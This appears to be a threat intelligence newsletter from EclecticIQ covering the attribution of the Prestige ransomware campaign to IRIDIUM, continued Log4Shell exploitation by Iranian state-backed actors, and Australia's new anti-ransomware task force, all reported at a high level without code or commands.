Threat Actor Update: IRIDUIM Attributed to Prestige Ransomware Campaign
A ransomware campaign targeting transportation and logistics organizations in Ukraine and Poland has been attributed to a group called IRIDIUM. The ransomware campaign used a previously unidentified ransomware payload called ‘Prestige’ which was observed deployed on October 11th, 2022. The objective of the campaign was to cause disruption not financial gain. IRIDUIM is a Russia-based actor that overlaps with Sandworm and has been consistently active in Ukraine with IRIDIUM being linked to activity in March 2022 (1).
The Ukraine war continues to highlight the increased use of ransomware for non-financial means. Ransomware has been used for non-financial means before (2); however, many ransomware incidents have historically been financially driven. For example, the HermacticRansom malware used in Ukraine is suspected to be a smokescreen for destructive attacks (3). Hacktivist group FRwL has used ransomware during the Ukraine war without demanding a ransom (4, 14). BRONZE STARLIGHT, another cyber threat actor group, is suspected of using ransomware to distract responders from their true motivation, cyber espionage (5).
Exploit Tools and Targets: Log4j Continues to be Actively Exploited
Iranian government-sponsored APTs have been observed by the U.S. Cybersecurity and Infrastructure Agency (CISA) exploiting Log4Shell (CVE-2021-44228) for persistence within the U.S. Federal Civilian Executive Branch (FCEB). The actors exploited an unpatched VMware Horizon server using Log4Shell to install the XMRig crypto miner within FCEB. They moved laterally within the environment to the domain controller, compromised credentials, and installed Ngrok reverse proxies on multiple hosts to maintain persistence within the victims’ environments (6).
Log4Shell will almost certainly be exploited in the short and medium term by actors across the threat landscape. Log4shell is a remote code execution (RCE) vulnerability in the popular Java logging library log4j, used in multiple software products. Other Iran-linked threat groups have exploited log4j in SysAid Server instances (7) and VMWare Horizon (8). Ransomware groups have also exploited log4j, the Avos ransomware group used the Log4Shell vulnerability for initial access to the victim’s environment (9).
Policy Keynotes: Australia Announces a Task Force to Disrupt and Stop Cybercrime
Australia on October 12th announced the formation of the Joint Standing Operation task force aimed at disrupting and stopping cybercriminal syndicates with a priority on groups using ransomware. The operation will collect intelligence and identify networks, infrastructure, and individual leaders, regardless of their location. The joint standing operation will involve the Australian Federal Police and the Australian Signals Directorate who will be given powers to hunt down and disrupt criminals (10).
The Australian government’s announcement shows a continued trend at a national and international level to address cybercriminal threats, specifically actors using ransomware. The United States government launched the Ransomware Task Force (RTF) in April 2021 to address the growing threat ransomware poses to U.S. private and public organizations (11). The European Union has adopted legislation requiring businesses, administrations, and organizations involved with infrastructure to meet stricter supervisory obligations and enforcement measures (12). The International Counter Ransomware Task Force (ICRTF), involving 36 countries and the EU, has been established to coordinate resilience, disruption, and information and capability sharing against ransomware threats (13).
About EclecticIQ Intelligence and Research
EclecticIQ is a global provider of threat intelligence, hunting and response technology and services. Headquartered in Amsterdam, the EclecticIQ Intelligence and Research team is made up of experts from Europe and the U.S. with decades of experience in cyber security and intelligence in industry and government.
We would love to hear from you. Please send us your feedback by emailing us at firstname.lastname@example.org or fill in the EclecticIQ Audience Interest Survey to drive our research toward your priority area.
Find the Analyst Prompt and earlier editions in our public TAXII collection for easy use in your security stack.
TAXII v1 Discovery services: https://cti.eclecticiq.com/taxii/discovery
Please refer to our support page for guidance on how to access the feeds.
You might also be interested in:
Ukraine-Russia Conflict: Ukraine Alerts Energy Enterprises to Possible Cyberattack Escalation
Killnet Effectively Amplifies Russian Narratives but has Limited DDoS Capabilities
Attack Against Tata Power Highlights Cyber Risk to India’s Growing and Increasingly Connected Population